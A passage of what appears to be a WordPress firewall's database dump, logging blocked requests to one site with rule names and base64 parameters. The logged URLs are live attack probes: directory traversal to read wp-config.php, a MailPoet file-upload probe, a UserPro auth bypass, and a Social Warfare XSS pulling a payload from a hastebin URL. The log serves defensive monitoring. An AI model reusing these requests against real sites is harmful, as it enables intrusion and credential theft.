wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(148,1627859864.793207,1627859864.716700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(149,1627859905.227816,1627859905.131500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(150,1627859904.501403,1627859904.387200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(151,1627874116.720430,1627874116.496000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(152,1627874128.641427,1627874128.454100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(153,1627874126.334758,1627874126.244100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(154,1627874139.693368,1627874139.576200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(155,1627874172.769653,1627874172.692600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(156,1627874172.110528,1627874172.007900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(157,1627881855.754200,1627881855.676400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(158,1627881861.503819,1627881861.424600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(159,1627881860.171684,1627881860.094400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(160,1627881867.958465,1627881867.884500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(161,1627881896.587544,1627881896.512800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(162,1627881895.924672,1627881895.848900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(163,1627892959.918040,1627892959.840100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(164,1627892970.265428,1627892970.184200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(165,1627892968.928053,1627892968.848000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(166,1627892977.550309,1627892977.472900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(167,1627893011.319378,1627893011.195300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(168,1627893010.598197,1627893010.519500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(169,1627900686.939846,1627900686.797200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(170,1627900698.072309,1627900697.989800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(171,1627900696.725703,1627900696.649000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(172,1627900707.159725,1627900706.901000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(173,1627900746.471442,1627900746.393000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(174,1627900745.824462,1627900745.738800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(175,1627929181.491987,1627929181.355300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(176,1627929188.230212,1627929188.124600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(177,1627929186.844193,1627929186.748000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(178,1627929194.090965,1627929193.985400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(179,1627929221.240062,1627929220.660700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(180,1627929220.083739,1627929219.961000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(181,1627934902.241383,1627934902.154400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(182,1627934908.153207,1627934908.073100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(183,1627934906.762726,1627934906.682400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(184,1627934914.644897,1627934914.552900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(185,1627934940.072806,1627934939.990700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - 